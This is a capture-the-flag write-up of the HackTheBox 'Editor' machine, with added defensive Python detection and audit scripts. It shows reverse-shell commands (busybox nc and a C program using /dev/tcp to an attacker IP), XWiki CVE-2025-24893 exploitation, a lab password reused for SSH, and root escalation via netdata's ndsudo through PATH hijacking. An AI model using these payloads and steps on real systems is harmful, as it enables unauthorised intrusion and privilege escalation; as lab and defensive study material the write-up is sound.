HackTheBox Editor Writeup

Editor is an easy Linux machine running a vulnerable version of XWiki that allows unauthenticated remote code execution, providing an initial foothold. Enumeration of the system reveals a misconfigured SUID binary, which can be exploited to escalate privileges and gain root access.
Enumeration
After spawning the machine and connecting to the VPN, we start with the initial enumeration.
Initial Nmap Scan
We begin by running an initial nmap scan with the following command:
nmap -sC -sV -vv -oA nmap/initial_scan 10.10.11.80
-sC  Default script scan
-sV  Service version detection
-vv  Verbose output
-oA  Output all formats
Nmap reports 3 ports open:
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 63 Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (40 shown)
Web Footprinting
The HTTP title shows http://editor.htb, so first we add this hostname together with the IP to our hosts file.
Now we visit http://editor.htb in the browser and see the website for a code editor called SimplistCode Pro for Debian, Ubuntu, and Windows.

By looking around on the page we find an About section, which is not really interesting, and a Docs link. Docs navigates us to http://wiki.editor.htb/xwiki/, which is not available.

In addition, I downloaded both binaries and analyzed them a little, but didn’t find anything interesting. I also didn’t think that binary reverse engineering would be required on an easy box.
Therefore, we continue to focus on the web app and the wiki.
When reviewing our Nmap scan again, port 8080 catches my eye. We simply try to access http://editor.htb:8080 and it works. This takes us to the SimplistCode Pro Wiki, which is powered by XWiki 15.10.8.
By googling XWiki 15.10.8, we come across CVE-2025-24893.
To exploit the vulnerability we use the gunzf0x PoC from GitHub.
As far as I can understand, the PoC uses a template injection in the XWiki SolrSearch page (RSS output).
Groovy code is injected via the text= parameter and executes arbitrary system commands on the server via "COMMAND".execute().
The script generates the payload, URL-encodes it, appends it to the endpoint, and sends a GET request, triggering remote code execution. In this case, a reverse shell.
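From the defender's side, the request pattern just described is easy to spot in the web server logs. The following is an added example, not part of the writeup or the PoC: it parses nginx/Jetty access-log lines, URL-decodes the text= parameter of requests to the SolrSearch page and flags any that carry a Groovy macro or a Groovy .execute() call. The log lines are constructed samples, and the /xwiki/bin/get/Main/SolrSearch path is an assumption about where the RSS endpoint lives.

```python
"""Flag SolrSearch requests whose text= parameter carries Groovy code.

Added example (not from the writeup or the PoC author). The log lines are
constructed samples; the SolrSearch path is assumed, not taken from the page.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log excerpt in combined format (not real traffic).
SAMPLE_LOG = """\
10.10.14.13 - - [02/Aug/2025:10:01:12 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120
10.10.14.13 - - [02/Aug/2025:10:01:40 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=editor HTTP/1.1" 200 812
10.10.14.13 - - [02/Aug/2025:10:02:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Bgroovy%7D%7D%22id%22.execute%28%29%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 1290
10.10.14.13 - - [02/Aug/2025:10:02:30 +0000] "POST /xwiki/bin/view/Main/ HTTP/1.1" 302 0
"""

# Combined log format: client, identd, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A Groovy macro opener or a Groovy string-execution call inside the search text.
GROOVY_RE = re.compile(r'\{\{\s*groovy\b|\.execute\s*\(', re.IGNORECASE)


def is_solrsearch_injection(request_path: str) -> bool:
    """True when a SolrSearch request carries Groovy code in its text= parameter."""
    parts = urlsplit(request_path)
    if not parts.path.lower().endswith('/solrsearch'):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get('text', []):
        # parse_qs already decoded once; decode again to catch double-encoding.
        if GROOVY_RE.search(unquote(value)):
            return True
    return False


def find_suspicious(log_text: str) -> list[dict]:
    """Return one record per log line that matches the injection pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_solrsearch_injection(m['path']):
            hits.append({'ip': m['ip'], 'time': m['ts'],
                         'status': m['status'], 'path': m['path']})
    return hits


if __name__ == '__main__':
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} {hit['path'][:80]}")
```

Because the payload arrives in a GET query string, it lands in the access log in full; a 200 response to such a request is the signal that the server rendered the injected macro rather than rejecting it.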
Gaining Foothold
The PoC is designed so that we pass the target URL with -t and the command we want to execute with -c.
I like to test remote code execution first with ping and tcpdump.
First we start tcpdump on our attack host to monitor ICMP traffic with the following command (the pcap filter keyword is lowercase):
tcpdump -i tun0 icmp
Second, we execute the script with a ping command back to our attack host:
python3 exploit.py -t 'http://editor.htb:8080' -c 'ping 10.10.14.13'
If we now see incoming ICMP packets in our tcpdump, we know that the RCE is working. In this case it is, so we grab a reverse shell from revshells and start the listener with nc on our attack host on port 9001:
nc -lvnp 9001
After that we start the exploit again, this time with the reverse shell, with the following:
python3 exploit.py -t 'http://editor.htb:8080' -c 'busybox nc 10.10.14.13 9001 -e sh'
If everything works, we now have a shell with the user xwiki on the box.
Now let's upgrade the shell with:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Lateral Movement
Looking around on the box, we find a home directory named oliver. However, we do not have access to it as xwiki. At least now we know there is a user called oliver on the box. We’ll make a note of that.
Now something strange happened that doesn’t affect the further escalation path, but I wanted to include it in the write-up anyway. I already solved this box while it was still active. Of course, I can only publish the write-up once the box has been retired. Nevertheless, I’m reproducing everything again before publication, just to check. In my first run, there was a directory ~/data/mails/ in the home directory of the user xwiki, which contained an email with a password reset link for a user. Unfortunately, the corresponding CSRF token was missing. However, since I found the validation and encryption token settings in the xwiki config, I thought that was the way to escalate. That turned out to be quite a rabbit hole, and I realized there had to be another way. The strange thing is that now, since the box was retired, the entire mail directory is missing, and with it the email.
Since I didn’t really get anywhere, I ran linpeas from /dev/shm, but unfortunately that didn’t really yield any useful results either.
While going through the configs and XML files of the wiki application again, I came across a plaintext password in the file /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml:
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
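This kind of finding is worth automating on the defensive side. The following is an added example, not from the writeup or the XWiki project: it parses a hibernate.cfg.xml with the Python standard library, reports every *.password property that holds a literal value instead of an externalised ${...} reference, and checks whether the file is readable by users other than its owner. The configuration below is a constructed sample modelled on the file quoted above, with a placeholder in place of the box's credential.

```python
"""Audit a Hibernate configuration for plaintext credentials and loose permissions.

Added example, not the writeup's or XWiki's code. SAMPLE_CFG is a constructed
sample with a placeholder password.
"""
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

SAMPLE_CFG = """<?xml version="1.0" encoding="UTF-8"?>
<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">PLACEHOLDER_PASSWORD</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
  </session-factory>
</hibernate-configuration>
"""


def find_plaintext_secrets(xml_text: str) -> list[tuple[str, str]]:
    """Return (property name, value) pairs for password properties holding literal values."""
    root = ET.fromstring(xml_text)
    hits = []
    for prop in root.iter('property'):
        name = prop.get('name', '')
        value = (prop.text or '').strip()
        if not name.endswith('.password') or not value:
            continue
        # ${...} values are resolved at runtime from the environment or a
        # secrets store, so only literal values are reported.
        if value.startswith('${') and value.endswith('}'):
            continue
        hits.append((name, value))
    return hits


def readable_by_others(path: str) -> bool:
    """True when group or world read bits are set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_config_file(path: str) -> dict:
    """Combine the content and permission checks into one report."""
    with open(path, encoding='utf-8') as fh:
        secrets = find_plaintext_secrets(fh.read())
    return {
        'plaintext_passwords': [name for name, _ in secrets],
        'readable_by_others': readable_by_others(path),
    }


def demo() -> dict:
    """Write the sample config with the default 0644 mode and audit it."""
    with tempfile.NamedTemporaryFile('w', suffix='.xml', delete=False) as fh:
        fh.write(SAMPLE_CFG)
        path = fh.name
    try:
        os.chmod(path, 0o644)
        return audit_config_file(path)
    finally:
        os.unlink(path)


if __name__ == '__main__':
    print(demo())
```

The audit reports two separate problems: the literal credential itself, and the fact that the file is readable by every account on the host, which is exactly why the low-privileged xwiki shell could read it. Fixing either one (externalising the secret, or restricting the file to the service account with mode 0600) removes the lateral movement path described here.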
User Flag
Since we know that the user oliver must exist on the box, we simply try to log in via SSH with oliver:theEd1t0rTeam99.
It works.
From here we can cat the user.txt from oliver's home directory:
cat /home/oliver/user.txt
Privilege Escalation
As user oliver, we run linpeas again and see the following interesting results:
╔═══════════════════════╣ Files with Interesting Permissions ╠═══════════════════════
╚════════════════════════════════════════════════════════════════════════════════════
╔═══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-x--- 1 root netdata 943K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.4M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 196K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 80K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 876K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 4.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)
-rwsr-xr-x 1 root root 40K Feb 6 2024 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 71K Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr 9 2024 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 227K Jun 25 12:48 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 59K Feb 6 2024 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 47K Apr 9 2024 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 72K Feb 6 2024 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-- 1 root messagebus 35K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 331K Apr 11 12:05 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Feb 26 2022 /usr/libexec/polkit-agent-helper-1
After a little Googling for netdata and SUID, we find CVE-2024-32019 and a PoC on GitHub. The PoC compiles a small program that calls setuid(0) and then opens a reverse shell as root via /dev/tcp/…; it abuses the insecure netdata binary ndsudo, which can run any file as root.
We check if the user oliver is in the netdata group with:
groups
Indeed, he is, so we can also use the ndsudo binary as oliver.
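The two facts that make this escalation possible, a SUID-root binary that only the netdata group may execute and oliver's membership in that group, can be checked together. The following is an added example, not from the writeup or linpeas: it parses ls -l style lines like the ones above, keeps setuid-root binaries, marks those that are executable only by their group and resolves that group's members from an /etc/group excerpt, and separately marks binaries outside distribution-managed directories. The listing and group file below are constructed samples.

```python
"""Audit group-gated and unpackaged SUID-root binaries.

Added example, not the writeup's or linpeas' code. SAMPLE_LS and SAMPLE_GROUP
are constructed samples.
"""
import re

SAMPLE_LS = """\
-rwsr-x--- 1 root netdata 196K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 943K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-xr-x 1 root root 227K Jun 25 12:48 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 35K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwxr-xr-x 1 root root 35K Apr 9 2024 /usr/bin/ls
"""

SAMPLE_GROUP = """\
root:x:0:
netdata:x:998:oliver
messagebus:x:103:
oliver:x:1000:
"""

# perms, link count, owner, group, size, month, day, year-or-time, path
LS_RE = re.compile(
    r'^(?P<perms>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+'
    r'\S+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)'
)

# Directories normally populated by the package manager.
PACKAGED_DIRS = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/usr/libexec/')


def parse_groups(group_text: str) -> dict[str, list[str]]:
    """Map group name -> supplementary members from /etc/group lines."""
    members = {}
    for line in group_text.splitlines():
        if not line or line.startswith('#'):
            continue
        name, _pw, _gid, users = line.split(':', 3)
        members[name] = [u for u in users.split(',') if u]
    return members


def audit_suid(ls_text: str, group_text: str) -> list[dict]:
    """Report setuid-root binaries that are group-gated or outside packaged paths."""
    groups = parse_groups(group_text)
    findings = []
    for line in ls_text.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        perms = m['perms']
        # perms[3] is the owner execute slot: 's'/'S' means setuid is set.
        if perms[3] not in 'sS' or m['owner'] != 'root':
            continue
        group_exec = perms[6] in 'xs'
        other_exec = perms[9] in 'xt'
        gated = group_exec and not other_exec
        findings.append({
            'path': m['path'],
            'group': m['group'],
            'group_gated': gated,
            'members': groups.get(m['group'], []) if gated else [],
            'unpackaged': not m['path'].startswith(PACKAGED_DIRS),
        })
    return [f for f in findings if f['group_gated'] or f['unpackaged']]


def runnable_by(user: str, findings: list[dict]) -> list[str]:
    """Paths of group-gated SUID-root binaries the given user may execute."""
    return [f['path'] for f in findings if f['group_gated'] and user in f['members']]


if __name__ == '__main__':
    report = audit_suid(SAMPLE_LS, SAMPLE_GROUP)
    for f in report:
        print(f"{f['path']} group={f['group']} gated={f['group_gated']} "
              f"unpackaged={f['unpackaged']} members={f['members']}")
    print('oliver can run:', runnable_by('oliver', report))
```

On a real host the inputs would come from find / -perm -4000 -exec ls -l {} + and /etc/group; the useful output is the short list of human accounts that can reach a root-owned SUID binary through a service group, which is the membership to prune (or the netdata version to upgrade) to close this path.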
We adapt the script to our needs as follows:
#include <unistd.h> // for setuid, setgid, execl
#include <stddef.h> // for NULL

int main(void) {
    setuid(0); // ndsudo runs us as root, so assume uid 0 outright
    setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1", NULL);
    return 0;
}
Now we compile it with:
x86_64-linux-gnu-gcc -o nvme pe.c -static
After that we transfer the compiled binary to the target host and make it executable:
chmod +x nvme
Then we set up a nc listener on our attacker machine:
nc -lvnp 9001
Then we exploit the vulnerable binary via PATH manipulation:
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Now we have a reverse shell as root.
Root Flag
In the reverse shell we can cat the flag from root’s home with:
cat /root/root.txt